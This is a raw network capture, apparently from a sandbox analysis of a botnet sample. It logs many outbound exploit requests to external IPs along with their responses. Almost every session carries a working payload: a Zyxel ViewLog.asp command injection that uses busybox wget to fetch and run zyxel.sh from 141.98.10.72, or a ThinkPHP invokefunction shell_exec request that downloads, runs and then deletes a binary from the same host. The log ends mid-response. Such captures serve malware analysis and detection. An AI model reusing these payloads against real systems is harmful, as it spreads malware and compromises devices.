Feb 14, 2024 09:30:23.320090055 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
641	192.168.2.15	60152	31.44.143.161	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:23.323806047 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
642	192.168.2.15	51418	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:23.490396023 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:54Auth Result: ????.
Feb 14, 2024 09:30:24.656995058 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:54Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
643	192.168.2.15	52048	31.136.54.182	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:23.493983030 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:24.184581041 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:25.528588057 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:28.248502016 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.624402046 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:44.375952005 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:05.879410982 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:48.886236906 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
644	192.168.2.15	37842	85.153.141.71	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:23.548598051 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:23.788208961 CET	221	IN	HTTP/1.1 307 Temporary Redirect Location: https://192.168.0.14:5886/cgi-bin/ViewLog.asp Date: Wed, 14 Feb 2024 08:30:23 GMT Connection: keep-alive Keep-Alive: timeout=5 Transfer-Encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
645	192.168.2.15	45118	94.122.71.57	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:23.557600021 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
646	192.168.2.15	56410	94.120.215.67	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:23.558973074 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
647	192.168.2.15	60758	95.0.173.237	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:23.574474096 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
648	192.168.2.15	54820	62.3.30.54	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:23.758946896 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:24.024641037 CET	251	IN	HTTP/1.0 307 Temporary Redirect Content-Length: 0 Content-Type: text/html Date: Tue, 26 Dec 2023 00:34:18 GMT Expires: Tue, 26 Dec 2023 00:34:18 GMT Server: Mikrotik HttpProxy Connection: close Location: http://paynet.ge/suspend

Session ID	Source IP	Source Port	Destination IP	Destination Port
649	192.168.2.15	51350	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:23.908102036 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:54Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
650	192.168.2.15	56926	88.82.219.216	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:24.040725946 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
651	192.168.2.15	51466	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:24.189205885 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:55Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
652	192.168.2.15	33398	95.100.231.123	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:24.256489038 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:24.466244936 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:24 GMT Date: Wed, 14 Feb 2024 08:30:24 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 61 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 34 26 23 34 36 3b 33 36 37 65 63 31 30 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.4a7e19b8.1707899424.367ec10e</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
653	192.168.2.15	42386	95.100.226.52	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:24.466281891 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:24.675966024 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:24 GMT Date: Wed, 14 Feb 2024 08:30:24 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 61 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 34 26 23 34 36 3b 33 36 37 65 63 31 62 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.4a7e19b8.1707899424.367ec1be</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
654	192.168.2.15	59204	95.68.46.234	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:24.482803106 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:25.253091097 CET	64	IN	HTTP/1.1 400 Bad Request Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
655	192.168.2.15	49862	95.58.114.139	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:24.552038908 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:24.848285913 CET	29	IN	HTTP/1.1 200 OK
Feb 14, 2024 09:30:24.848459959 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
656	192.168.2.15	51832	95.217.161.169	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:24.692626953 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:24.919362068 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.16.1 Date: Wed, 14 Feb 2024 08:30:24 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
657	192.168.2.15	42310	95.101.41.168	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:24.695697069 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:24.925540924 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:24 GMT Date: Wed, 14 Feb 2024 08:30:24 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 36 63 39 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 32 34 26 23 34 36 3b 34 33 65 32 62 32 32 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.a6c91002.1707899424.43e2b223</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
658	192.168.2.15	48976	95.101.14.37	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:24.696063042 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:24.926254034 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:30:24 GMT Date: Wed, 14 Feb 2024 08:30:24 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 